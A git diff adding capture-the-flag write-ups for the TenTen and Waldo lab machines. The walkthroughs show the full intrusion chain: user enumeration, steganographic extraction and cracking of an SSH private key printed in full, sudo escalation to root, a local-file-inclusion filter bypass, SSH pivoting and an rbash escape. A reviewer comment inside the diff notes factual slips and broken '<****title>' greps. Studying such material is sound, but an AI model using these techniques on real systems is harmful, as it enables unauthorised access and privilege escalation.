+ [+] http://10.10.10.10/wp-cron.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 60%
+ | References:
+ | - https://www.iplocation.net/defend-wordpress-from-ddos
+ | - https://github.com/wpscanteam/wpscan/issues/1299
+
+ [+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
+ | Found By: Rss Generator (Passive Detection)
+ | - http://10.10.10.10/index.php/feed/, https://wordpress.org/?v=4.7.3
+ | - http://10.10.10.10/index.php/comments/feed/, https://wordpress.org/?v=4.7.3
+
+ [+] WordPress theme in use: twentyseventeen
+ | Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
+ | Last Updated: 2019-05-07T00:00:00.000Z
+ | Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
+ | [!] The version is out of date, the latest version is 2.2
+ | Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
+ | Style Name: Twenty Seventeen
+ | Style URI: https://wordpress.org/themes/twentyseventeen/
+ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
+ | Author: the WordPress team
+ | Author URI: https://wordpress.org/
+ |
+ | Found By: Css Style In Homepage (Passive Detection)
+ |
+ | Version: 1.1 (80% confidence)
+ | Found By: Style (Passive Detection)
+ | - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'
+
+ [+] Enumerating Vulnerable Plugins (via Passive Methods)
+ [+] Checking Plugin Versions (via Passive and Aggressive Methods)
+
+ [i] No plugins Found.
+
+ [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
+ Checking Known Locations - Time: 00:00:07 <======================================> (324 / 324) 100.00% Time: 00:00:07
+ [+] Checking Theme Versions (via Passive and Aggressive Methods)
+
+ [i] No themes Found.
+
+ [+] Enumerating Timthumbs (via Passive and Aggressive Methods)
+ Checking Known Locations - Time: 00:00:55 <====================================> (2575 / 2575) 100.00% Time: 00:00:55
+
+ [i] No Timthumbs Found.
+
+ [+] Enumerating Config Backups (via Passive and Aggressive Methods)
+ Checking Config Backups - Time: 00:00:00 <=========================================> (21 / 21) 100.00% Time: 00:00:00
+
+ [i] No Config Backups Found.
+
+ [+] Enumerating DB Exports (via Passive and Aggressive Methods)
+ Checking DB Exports - Time: 00:00:00 <=============================================> (36 / 36) 100.00% Time: 00:00:00
+
+ [i] No DB Exports Found.
+
+ [+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
+ Brute Forcing Attachment IDs - Time: 00:00:02 <==================================> (100 / 100) 100.00% Time: 00:00:02
+
+ [i] No Medias Found.
+
+ [+] Enumerating Users (via Passive and Aggressive Methods)
+ Brute Forcing Author IDs - Time: 00:00:00 <========================================> (10 / 10) 100.00% Time: 00:00:00
+
+ [i] User(s) Identified:
+
+ [+] takis
+ | Found By: Author Posts - Author Pattern (Passive Detection)
+ | Confirmed By:
+ | Rss Generator (Passive Detection)
+ | Wp Json Api (Aggressive Detection)
+ | - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page;=1
+ | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
+ | Login Error Messages (Aggressive Detection)
+
+ [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
+
+ [+] Finished: Fri Feb 21 15:26:54 2020
+ [+] Requests Done: 3082
+ [+] Cached Requests: 40
+ [+] Data Sent: 762.012 KB
+ [+] Data Received: 707.953 KB
+ [+] Memory used: 209.004 MB
+ [+] Elapsed time: 00:01:17
+
+
+
+Looking at the results , we see that our scan picked up the usernames : takis and user1, let's head over to the website, clicking on the "jobs listing tab"
+
+
+
+Here we see that we are looking at what seems to be the page indexed 8, so let's see if we can list every page to see if we can find any irregularities
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → for i in $(seq 1 15); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<****title>'; done
+ 1: <****title>Job Application: Hello world! - Job Portal<****/title>
+ 2: <****title>Job Application: Sample Page - Job Portal<****/title>
+ 3: <****title>Job Application: Auto Draft - Job Portal<****/title>
+ 4: <****title>Job Application - Job Portal<****/title>
+ 5: <****title>Job Application: Jobs Listing - Job Portal<****/title>
+ 6: <****title>Job Application: Job Application - Job Portal<****/title>
+ 7: <****title>Job Application: Register - Job Portal<****/title>
+ 8: <****title>Job Application: Pen Tester - Job Portal<****/title>
+ 9: <****title>Job Application: - Job Portal<****/title>
+ 10: <****title>Job Application: Application - Job Portal<****/title>
+ 11: <****title>Job Application: cube - Job Portal<****/title>
+ 12: <****title>Job Application: Application - Job Portal<****/title>
+ 13: <****title>Job Application: HackerAccessGranted - Job Portal<****/title>
+ 14: <****title>Job Application - Job Portal<****/title>
+ 15: <****title>Job Application - Job Portal<****/title>
+
+Looks like we have something odd at the index 13, which could indicate an outdated wordpress plugin vulnerability : [CVE-2015-6668](https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/) Which details how one can access files at a certain url using the following syntax **/wp-content/uploads/%year%/%month%/%filename%**
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
+ --2020-02-21 15:40:29-- http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
+ Connecting to 10.10.10.10:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 262408 (256K) [image/jpeg]
+ Saving to: ‘HackerAccessGranted.jpg’
+
+ HackerAccessGranted.jpg 100%[===============================================>] 256.26K 418KB/s in 0.6s
+
+ 2020-02-21 15:40:29 (418 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → file HackerAccessGranted.jpg
+ HackerAccessGranted.jpg: JPEG image data, JFIF standard 1.01, resolution (DPCM), density 29x29, segment length 16, baseline, precision 8, 1500x1001, components 3
+
+
+Looking at the results, we seem to have downloaded a jpg file , but let's assume that this is no regular image, and it probably contains some information. Using steganography tools we discover the hidden data :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → steghide extract -sf HackerAccessGranted.jpg
+ Enter passphrase:
+ wrote extracted data to "id_rsa".
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → file id_rsa
+ id_rsa: PEM RSA private key
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → cat id_rsa
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C
+
+ /HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
+ tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
+ 1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf
+ K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm
+ SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH
+ WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP
+ VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT
+ J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw
+ AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g
+ 2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo
+ 6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA
+ pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk
+ tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm
+ KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9
+ 4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF
+ 2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7
+ L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS
+ VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv
+ 5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r
+ Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W
+ p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf
+ yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB
+ 9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO
+ vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J
+ YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP
+ -----END RSA PRIVATE KEY-----
+
+
+Looks like we extracted a private key ! although it is encrypted, so we'll use sshng2john and john to crack it and somehow guess it's passphrase.
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → curl -sk https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py > sshng2john.py
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → python sshng2john.py id_rsa > id_rsa.encrypted
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → file id_rsa.encrypted
+ id_rsa.encrypted: ASCII text, with very long lines
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
+ Created directory: /home/nihilist/.john
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+ Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
+ Cost 2 (iteration count) is 1 for all loaded hashes
+ Will run 4 OpenMP threads
+ Note: This format may emit false positives, so it will keep trying even after
+ finding a possible candidate.
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ superpassword (id_rsa)
+ Warning: Only 2 candidates left, minimum 4 needed for performance.
+ 1g 0:00:00:09 DONE (2020-02-21 15:46) 0.1006g/s 1442Kp/s 1442Kc/s 1442KC/sa6_123..*7¡Vamos!
+ Session completed
+
+
+and it was quick ! the password was at the beginning of rockyou.txt : superpassword , now let's use it to log into the machine :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → chmod 600 id_rsa
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
+ → ssh -i id_rsa takis@10.10.10.10
+ Enter passphrase for key 'id_rsa':
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 65 packages can be updated.
+ 39 updates are security updates.
+
+
+ Last login: Fri May 5 23:05:36 2017
+ takis@tenten:~$ whoami
+ takis
+ takis@tenten:~$ cat /home/takis/user.txt
+ e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user password.
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc we check if we can execute any binary as root without passwords using sudo -l
+
+
+ takis@tenten:~$ cat /root/root.txt
+ cat: /root/root.txt: Permission denied
+ takis@tenten:~$ sudo -l
+ Matching Defaults entries for takis on tenten:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User takis may run the following commands on tenten:
+ (ALL : ALL) ALL
+ (ALL) NOPASSWD: /bin/fuckin
+
+
+looks like we have a candidate named fuckin , let's see if we can execute commands as root :
+
+
+ takis@tenten:~$ fuckin id
+ uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
+
+ takis@tenten:~$ sudo fuckin id
+ uid=0(root) gid=0(root) groups=0(root)
+
+
+And we were right , we can execute commands as root, let's print out the root flag :
+
+
+ takis@tenten:~$ sudo fuckin cat /root/root.txt
+ f9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
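Review bot: `Looking at the results , we see that our scan picked up the usernames : takis and user1` does not match the WPScan output above it, which under `[i] User(s) Identified:` lists only `takis`; drop `user1` or show where it came from. The curl loop and its output use `<****title>` where `<title>` is meant (an export artifact): as written the grep pattern `'<****title>'` would match nothing, so restore `<title>` in both the command and the fifteen output lines. `And that's it ! we have been able to print out the user password.` should read "user flag" (the file read is `/home/takis/user.txt`). Minor: "it's passphrase" should be "its passphrase", and the opening paragraph says the scan uses `-sC`/`-sV` while the first command shown is the `-F` fast scan. For the hardening angle, the conclusion could say in one line that the chain here is a file-name disclosure in an outdated plugin followed by an SSH key whose passphrase is in rockyou.txt; the weak passphrase, not the steganography, is what made the key usable, and that is the part an administrator can fix.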
diff --git a/Medium/30.md b/Medium/30.md
new file mode 100644
index 0000000..9be2658
--- /dev/null
+++ b/Medium/30.md
@@ -0,0 +1,451 @@
+# Waldo Writeup
+
+
+
+## Introduction :
+
+Waldo is a Medium linux box released back in August 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -F 10.10.10.87 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 10:34 GMT
+ Nmap scan report for 10.10.10.87
+ Host is up (0.096s latency).
+ Not shown: 8317 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 8888/tcp filtered sun-answerbook
+
+ Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -sCV -p22,80,8888 10.10.10.87
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 10:35 GMT
+ Nmap scan report for 10.10.10.87
+ Host is up (0.081s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 c4:ff:81:aa:ac:df:66:9e:da:e1:c8:78:00:ab:32:9e (RSA)
+ | 256 b3:e7:54:6a:16:bd:c9:29:1f:4a:8c:cd:4c:01:24:27 (ECDSA)
+ |_ 256 38:64:ac:57:56:44:d5:69:de:74:a8:88:dc:a0:b4:fd (ED25519)
+ 80/tcp open http nginx 1.12.2
+ |_http-server-header: nginx/1.12.2
+ | http-title: List Manager
+ |_Requested resource was /list.html
+ |_http-trane-info: Problem with XML parsing of /evox/about
+ 8888/tcp filtered sun-answerbook
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds
+
+
+
+ {Ø} root [ 10.10.14.24/23 ] [/home/nihilist]
+ → echo '10.10.10.87 waldo.htb' >> /etc/hosts
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Here we are greeted with a simple http website, and peeking at the sourcecode we are hinted towards a /list.js script:
+
+
+
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → curl -sk http://10.10.10.87/list.js
+
+
+Whose script returns quite a few javascript functions, but we'll take a closer look at the readFile function:
+
+
+ function readFile(file){
+ var xhttp = new XMLHttpRequest();
+ xhttp.open("POST","fileRead.php",false);
+ xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+ xhttp.send('file=' + file);
+ if (xhttp.readyState === 4 && xhttp.status === 200) {
+ return xhttp.responseText;
+ }else{
+ }
+ }
+
+
+This function takes in an XML HTTP Requestn which can be sent as a POST request to /fileRead.php, and from there we can use the file= parameter to read the content of the files, so we'll see if we can get Local File Inclusion. Let's start up Burpsuite and craft our custom POST Request :
+
+
+
+Intercept our GET request aimed at /fileRead.php and send it to burpsuite's Repeater (CTRL+R) and go there (CTRL+SHIFT+R)
+
+
+
+Now just changing the POST request isn't enough we need to tweak the POST Request further :
+
+
+
+Now that we can read the contents of dirRead.php whose function uses a str_array function filter to replace the characters that could be used for LFI.
+
+
+ str_replace( array(\"..\/\", \"..\\\"\"), \"\", $_POST['path']);
+
+
+
+Without the backslashes becomes :
+
+
+ str_replace( array("../", "..\"), "", $_POST['path']);
+
+
+
+And here we see that we are able to bypass the filter by using this sequence : **....//....//....//....//**
+
+
+
+Now that we have verified that it was possible to list the directories in /home, we found the user "nobody", now let's try to see if he has any interesting files in his .ssh folder :
+
+
+
+it looks like the .monitor file seems interesting, so let's print it using /fileRead.php using the local file inclusion we used for /dirRead.php:
+
+ 
+
+And we have a private ssh key ! now let's save it locally, and we need to transform the \n into new lines, remove the remaining \, give it the appropriate permissions and then use it to log in via ssh:
+
+
+
+Once the \n newlines are replaced with actual newlines, remove the backslashes:
+
+
+
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → nano pkey
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → chmod 600 pkey
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → ssh -i pkey nobody@10.10.10.87
+ The authenticity of host '10.10.10.87 (10.10.10.87)' can't be established.
+ ECDSA key fingerprint is SHA256:S4nfJbcTY7WAdYp2v16xgnUj4MEIzqZ/jwbGI92FXEk.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.87' (ECDSA) to the list of known hosts.
+ Welcome to Alpine!
+
+ The Alpine Wiki contains a large amount of how-to guides and general
+ information about administrating Alpine systems.
+ See <****http://wiki.alpinelinux.org>.
+ waldo:~$ whoami
+ nobody
+ waldo:~$ cat ~/user.txt
+ 32XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now what's weird here is that we have been able to login as the user nobody with the .monitor private key, although there should be a monitor user
+
+
+ waldo:~$ cat /etc/passwd
+ root:x:0:0:root:/root:/bin/ash
+ bin:x:1:1:bin:/bin:/sbin/nologin
+ daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ adm:x:3:4:adm:/var/adm:/sbin/nologin
+ lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ sync:x:5:0:sync:/sbin:/bin/sync
+ shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+ halt:x:7:0:halt:/sbin:/sbin/halt
+ mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ news:x:9:13:news:/usr/lib/news:/sbin/nologin
+ uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+ operator:x:11:0:operator:/root:/bin/sh
+ man:x:13:15:man:/usr/man:/sbin/nologin
+ postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
+ cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+ sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+ at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
+ squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
+ xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
+ games:x:35:35:games:/usr/games:/sbin/nologin
+ postgres:x:70:70::/var/lib/postgresql:/bin/sh
+ cyrus:x:85:12::/usr/cyrus:/sbin/nologin
+ vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
+ ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+ smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
+ guest:x:405:100:guest:/dev/null:/sbin/nologin
+ nobody:x:65534:65534:nobody:/home/nobody:/bin/sh
+ nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin
+ waldo:~$ cat /etc/passwd | grep monitor
+ waldo:~$
+
+
+But as you can see, the user monitor is not there, poking around we realise that we are in a container. So this would potentially mean that we are not in the system itself, but just contained within it. So we can assume that we are able to login via ssh as the user monitor into the real system the same way by simply specifying the correct username, which in this case would be "monitor"
+
+
+ {Ø} nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → ssh -i pkey monitor@10.10.10.87
+
+
+Which you probably guessed , can't be done remotely, we have to do it from the box itself, hence the Pivoting aspect of this box:
+
+
+ [0] nihilist [ 10.10.14.24/23 ] [~/_HTB/Waldo]
+ → ssh -i pkey nobody@10.10.10.87
+ Welcome to Alpine!
+
+ The Alpine Wiki contains a large amount of how-to guides and general
+ information about administrating Alpine systems.
+ See .
+ waldo:~$ cd .ssh
+ waldo:~/.ssh$ ssh -i .monitor monitor@127.0.0.1
+
+
+
+And only then we are able to really land on the system :
+
+
+ waldo:~/.ssh$ ssh -i .monitor monitor@127.0.0.1
+ The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
+ ECDSA key fingerprint is SHA256:YHb7KyiwRxyN62du1P80KmeA9Ap50jgU6JlRaXThs/M.
+ Are you sure you want to continue connecting (yes/no)? yes
+ Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
+ Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64
+ &.
+ @@@,@@/ %
+ #*/%@@@@/.&@@,
+ @@@#@@#&@#&@@@,*%/
+ /@@@##########@@&*(*
+ (@################%@@@@@. /**
+ @@@@############%@@@@@@@@@@@@@@@@@@@@@@@@%((/
+ %@@@@%##########&@@@.... .#%#@@@@@@@#
+ @@&%#########@@@@/ */@@@%(((@@@%
+ @@@#%@@%@@@, *&@@@&%(((#((((@@(
+ /(@@@@@@@ *&@@@@%((((((((((((#@@(
+ %/#@@@/@ @#/@ ..@@@@%(((((((((((#((#@@@@@@@@@@@@,
+ %@*(@#%@., /@@@@&(((((((((((((((&@@@@@@######%%@@@@# &
+ *@@@@@# .&@@@#(((#(#((((((((#%@@@@@%###&@@@@@@@@@&%##&@@@@@@/
+ /@@ #@@@(((((((((((#((@@@@@%%%%@@@@%#########%&@@@@@@@@&
+ *@@ *%@@@@#((((((((((((((#@@@@@@@@@@%####%@@@@@@@@@@@@###&@@@@@@@&
+ %@/ .&%@@%#(((((((((((((((#@@@@@@@####%@@@%#############%@@@&%##&@@/
+ @@@@@@%(((((((((((##(((@@@@&%####%@@@%#####&@@@@@@@@@@@@@@@#&@@@@@@@@@/
+ @@@&(((#((((((((((((#@@@@@&@@@@######@@@###################&@@@####%@@*
+ @@#(((((((((((((#@@@@%&@@.,,.*@@@%#####@@@@@@@@@@@@@@@@@@@%####%@@@@@@@@@@
+ *@@%((((((((#@@@@@@@%#&@@,,.,,.&@@@#####################%@@@@@@%######&@@.
+ @@@#(#&@@@@@#&@@@@@/,,,,,,,,@@@#####&@@@@@@@@&&%######%@@@@@@@@@@@
+ @@@@@@&%&@@@%#&@%%@@@@/,,,,,,,,,,/@@@@@@@#/,,.*&@@%&@@@@@@&%#####%@@@@.
+ .@@@###&@@@%%@(,,,%@&,.,,,,,,,,,,,,,.*&@@@@&(,*@@%%@@@@@@@@@@@@*
+ @@%##%@@/@@@%/@@@@@@@@@#,,,,.../@@@@@%#%&@@@@(&@&@&@@@@(
+ .@@#@@,,/@@@@&(. .&@@@&,,,.&@@/ #@@%@@@@@&@@@/
+ *@@@@@&@@.*@@@ %@@@*,&@@ *@@@@@&.#/,@/
+ *@@&*#@@@@@@@& #@( .@@@@@@& ,@@@, @@@@@(,@/@@
+ *@@/@#.#@@@@@/ %@@@, .@@&%@@@ &@& @@*@@*(@@#
+ (@@/@,,@@&@@@ &@@,,(@@& .@@%/@@,@@
+ /@@@*,@@,@@@* @@@,,,,,@@@@. *@@@%,@@**@#
+ %@@.%@&,(@@@@, /&@@@@,,,,,,,%@@@@@@@@@@%,,*@@,#@,
+ ,@@,&@,,,,(@@@@@@@(,,,,,.,,,,,,,,**,,,,,,.*@/,&@
+ &@,*@@.,,,,,..,,,,&@@%/**/@@*,,,,,&(.,,,.@@,,@@
+ /@%,&@/,,,,/@%,,,,,*&@@@@@#.,,,,,.@@@(,,(@@@@@(
+ @@*,@@,,,#@@@&*..,,,,,,,,,,,,/@@@@,*(,,&@/#*
+ *@@@@@(,,@*,%@@@@@@@&%@@@@@@@/,,,,,,,@@
+ @@*,,,,,,,,,.*/(//*,..,,,,,,,,,,,&@,
+ @@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@
+ &@&,,,,,,,,,,,,,,,,,,,,,,,,,,,,&@#
+ %@(,,,,,,,,,,,,,,,,,,,,,,,,,,,@@
+ ,@@,,,,,,,,@@@&&&%&@,,,,,..,,@@,
+ *@@,,,,,,,.,****,..,,,,,,,,&@@
+ (@(,,,.,,,,,,,,,,,,,,.,,,/@@
+ .@@,,,,,,,,,,,,,...,,,,,,@@
+ ,@@@,,,,,,,,,,,,,,,,.(@@@
+ %@@@@&(,,,,*(#&@@@@@@,
+
+ Here's Waldo, where's root?
+ Last login: Tue Jul 24 08:09:03 2018 from 127.0.0.1
+ -rbash: alias: command not found
+ monitor@waldo:~$ uname -a
+ -rbash: uname: command not found
+
+
+ From there we are in a restricted bash (rbash) but we can evade it by specifying the correct flags when we connect via ssh as the monitor user.
+
+ waldo:~/.ssh$ ssh -i .monitor monitor@127.0.0.1 -t bash --noprofile
+
+ monitor@waldo:~$ ls
+ app-dev bin
+
+ monitor@waldo:~$ uname -a
+ bash: uname: command not found
+
+ monitor@waldo:~$ echo $PATH
+ /home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1
+
+ As you can see, we need to manually set our $PATH variable, so let's make sure we can execute binaries from /bin /sbin /usr/bin and so on.
+
+ monitor@waldo:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
+ monitor@waldo:~$ uname -a
+ Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64 GNU/Linux
+
+ Now we have access to the binaries we need, and we can continue to poke around the box , we take a look into monitor/app-dev
+
+ monitor@waldo:~$ cd app-dev
+ monitor@waldo:~/app-dev$ pwd
+ /home/monitor/app-dev
+ monitor@waldo:~/app-dev$ ls
+ logMonitor logMonitor.bak logMonitor.c logMonitor.h logMonitor.h.gch logMonitor.o makefile v0.1
+
+ In here we have access to the sourcecode of an application written in C, although the interesting part is in the v0.1 folder :
+
+ monitor@waldo:~/app-dev$ cd v0.1
+ monitor@waldo:~/app-dev/v0.1$ ls -lash
+ total 24K
+ 4.0K drwxr-x--- 2 app-dev monitor 4.0K May 3 2018 .
+ 4.0K drwxrwx--- 3 app-dev monitor 4.0K May 3 2018 ..
+ 16K -r-xr-x--- 1 app-dev monitor 14K May 3 2018 logMonitor-0.1
+ monitor@waldo:~/app-dev/v0.1$ ./logMonitor-0.1 -a
+ Mar 20 06:17:01 waldo CRON[929]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 06:17:01 waldo CRON[929]: pam_unix(cron:session): session closed for user root
+ Mar 20 06:25:01 waldo CRON[934]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 06:25:01 waldo CRON[934]: pam_unix(cron:session): session closed for user root
+ Mar 20 07:17:01 waldo CRON[1018]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 07:17:01 waldo CRON[1018]: pam_unix(cron:session): session closed for user root
+ Mar 20 07:30:01 waldo CRON[1023]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 07:30:01 waldo CRON[1023]: pam_unix(cron:session): session closed for user root
+ Mar 20 08:17:01 waldo CRON[1047]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 08:17:01 waldo CRON[1047]: pam_unix(cron:session): session closed for user root
+ Mar 20 09:17:01 waldo CRON[1064]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 09:17:01 waldo CRON[1064]: pam_unix(cron:session): session closed for user root
+ Mar 20 10:17:01 waldo CRON[1095]: pam_unix(cron:session): session opened for user root by (uid=0)
+ Mar 20 10:17:01 waldo CRON[1095]: pam_unix(cron:session): session closed for user root
